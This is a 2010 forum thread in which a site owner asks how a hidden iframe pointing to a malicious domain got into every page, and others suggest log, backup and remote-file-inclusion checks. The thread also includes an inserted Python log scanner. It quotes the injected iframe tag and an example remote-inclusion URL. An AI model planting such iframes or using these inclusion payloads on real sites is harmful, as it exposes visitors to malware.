deansaddigh Posted April 18, 2010
Hi guys, somehow someone has physically changed my pages and added <iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe> How have they done this? Do you think they have got into our FTP account? Here's a page with it on: http://www.languageschoolsuk.com/coursecalculator.php If you look at the source code, right at the end near the footer, you can see it. Any help and advice would be brilliant because I have nooooo idea.
TeddyKiller Posted April 18, 2010
I don't have any ideas, but actually removing it is a start. If they continue to put it up, I'd suggest maybe track their IP and block it. Assuming it was user based, they could have done a lot more than adding in an iframe that is practically invisible. I can actually say that iframe is on every page in your site. I only checked 3, but if there are 3 random ones with the iframe in, it's likely there'll be a lot more!
TeddyKiller Posted April 18, 2010
http://www.Brenz.pl/rc/ is the actual site which was placed in the iframe. There was an unsuccessful typo. So.. I guess you got lucky, otherwise that could have been deadly. I just checked the site, it gave me a warning.
deansaddigh Posted April 18, 2010
Thanks Teddy for your advice, I have started to remove them all. The thing I don't understand is, to physically change the page, they would have to have hacked our FTP server and physically modified the page. Am I right in thinking this?
TeddyKiller Posted April 18, 2010
Hmm.. well, sort of. There are other methods of hacking. Though don't ask me.. I don't know how to hack.
PFMaBiSmAd Posted April 18, 2010
The web server access logs would indicate the who/what/when the files were modified (written to). That would pin down if it was through FTP access, through the web hosting control panel, or through a script on your site (or some other site on the server).
Assuming that your pages include content that is specified on the end of the URL, you should also look at the access logs to find any unusual URLs where your pages were requested with GET parameters that could have gotten your script(s) to execute included PHP code from another site. There would be whole URLs supplied as GET parameters, something like -
http://yourdomain.com/your_page.php?page=http://someURL/some_page.ext
You should also download all the files and compare them with the last backup you made so that you can both find exactly what was changed and find any new files (such as a file management script that got uploaded to your site).
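
The access-log check described in the post above, as an added example that is not part of the original post or any poster's code: it scans combined-format log lines for GET parameters whose value is itself a URL, including percent-encoded and double-encoded forms. The log lines, IP addresses and the `someurl.example` host are constructed sample data; the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL (scheme://...) is the pattern to review.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def decode_fully(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding (e.g. http%253A%252F%252F)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_url_parameters(lines):
    """Return (ip, time, path, param, value, status) for each URL-valued GET parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        target = urlsplit(m["target"])
        # parse_qsl removes one encoding layer; decode_fully removes any remaining ones.
        for name, raw in parse_qsl(target.query, keep_blank_values=True):
            value = decode_fully(raw)
            if REMOTE_RE.match(value):
                hits.append((m["ip"], m["time"], target.path, name, value, int(m["status"])))
    return hits


# Constructed sample lines (documentation IP ranges and an example host, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Apr/2010:03:12:45 +0100] "GET /your_page.php?page=http://someurl.example/some_page.ext HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [17/Apr/2010:03:13:02 +0100] "GET /your_page.php?page=contact HTTP/1.1" 200 2301 "-" "-"',
    '198.51.100.7 - - [17/Apr/2010:03:14:10 +0100] "GET /index.php?id=4&inc=hTTp%253A%252F%252Fsomeurl.example%252Fx.txt%3F HTTP/1.1" 404 312 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_url_parameters(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 on a page that includes files by parameter deserves a closer look at that script; the timestamp gives a window to compare against file modification times.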
deansaddigh Posted April 18, 2010
Thanks for taking the time to reply. I'm going to check what you have suggested. It looks quite complex, but I'll do some reading up on what you said.
Lekoaf Posted October 28, 2010
This is NOT someone who has hacked your FTP. This comes from a trojan virus on your computer that not only screws up your whole computer, denying you access to any antivirus sites and stopping all downloads; it also infects ALL your HTML files on your computer with this little IFrame script. I basically had to wipe my hard drive clean to get rid of the virus, and after getting all my backed up files to my computer again I noticed that I had "infected" my entire website as well the next time I updated it.
The reason for me necro posting this is because this topic comes up as top 3 on Google when searching for "Brenz.pl/rc/". I just thought the information should be correct. I hope this helps someone!